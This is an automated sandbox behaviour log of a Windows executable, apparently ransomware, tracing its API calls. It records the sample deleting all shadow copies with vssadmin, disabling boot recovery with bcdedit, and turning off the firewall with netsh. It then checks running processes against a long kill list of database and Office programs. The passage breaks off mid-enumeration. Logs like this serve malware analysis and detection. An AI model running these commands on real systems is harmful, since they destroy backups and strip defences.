# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 11.03.2020 17:18:03.951 Process: id = "1" image_name = "wmiapsrvr.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wmiapsrvr.exe.exe" page_root = "0x4797f000" os_pid = "0x618" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WMIAPSRVR.EXE.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x894 [0071.089] GetUserDefaultLangID () returned 0x409 [0071.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x39f09c | out: TokenHandle=0x39f09c*=0x84) returned 1 [0071.299] GetTokenInformation (in: TokenHandle=0x84, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x39f0a0 | out: TokenInformation=0x0, ReturnLength=0x39f0a0) returned 0 [0071.300] GetLastError () returned 0x7a [0071.300] GetProcessHeap () returned 0x780000 [0071.300] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x54) returned 0x794c40 [0071.300] GetTokenInformation (in: TokenHandle=0x84, TokenInformationClass=0x19, TokenInformation=0x794c40, TokenInformationLength=0x14, ReturnLength=0x39f0a0 | out: TokenInformation=0x794c40, ReturnLength=0x39f0a0) returned 1 [0071.300] GetSidSubAuthorityCount (pSid=0x794c48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x794c49 [0071.300] GetSidSubAuthority (pSid=0x794c48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x794c50 [0071.300] GetProcessHeap () returned 0x780000 [0071.300] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794c40 | out: hHeap=0x780000) returned 1 [0071.301] CloseHandle (hObject=0x84) returned 1 [0071.301] lstrcpyW (in: lpString1=0x39ee48, lpString2=" delete shadows /all /quiet" | out: lpString1=" delete shadows /all /quiet") returned=" delete shadows /all /quiet" [0071.301] CreateProcessW (in: lpApplicationName="C:\\Windows\\sysnative\\vssadmin.exe", lpCommandLine=" delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x39f050*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x39f094 | out: lpCommandLine=" delete shadows /all /quiet", lpProcessInformation=0x39f094*(hProcess=0x88, hThread=0x84, dwProcessId=0x830, dwThreadId=0x324)) returned 1 [0071.385] CloseHandle (hObject=0x84) returned 1 [0071.386] CloseHandle (hObject=0x88) returned 1 [0071.386] GetWindowsDirectoryW (in: lpBuffer=0x39ee1c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0071.386] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\sysnative\\cmd.exe" | out: lpString1="C:\\Windows\\sysnative\\cmd.exe") returned="C:\\Windows\\sysnative\\cmd.exe" [0071.386] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\sysnative\\cmd.exe", lpParameters="/c bcdedit /set {current} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.145] GetWindowsDirectoryW (in: lpBuffer=0x39ee1c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0112.145] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\sysnative\\cmd.exe" | out: lpString1="C:\\Windows\\sysnative\\cmd.exe") returned="C:\\Windows\\sysnative\\cmd.exe" [0112.145] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\sysnative\\cmd.exe", lpParameters="/c bcdedit /set {current} recoveryenabled no", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.408] GetWindowsDirectoryW (in: lpBuffer=0x39ee1c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0112.408] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\sysnative\\cmd.exe" | out: lpString1="C:\\Windows\\sysnative\\cmd.exe") returned="C:\\Windows\\sysnative\\cmd.exe" [0112.408] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\sysnative\\cmd.exe", lpParameters="/c netsh advfirewall set allprofiles state off", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0112.729] Process32FirstW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.730] lstrcmpiW (lpString1="[System Process]", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.730] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.732] lstrcmpiW (lpString1="System", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.732] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.732] lstrcmpiW (lpString1="smss.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.732] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.733] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.733] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.734] lstrcmpiW (lpString1="wininit.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.735] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.735] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.736] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.737] lstrcmpiW (lpString1="winlogon.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.737] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.738] lstrcmpiW (lpString1="services.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.738] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.739] lstrcmpiW (lpString1="lsass.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.740] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.740] lstrcmpiW (lpString1="lsm.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.741] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.742] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.742] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.743] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.743] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.744] lstrcmpiW (lpString1="svchost.exe", lpString2="msftesql.exe, sqlagent.exe, 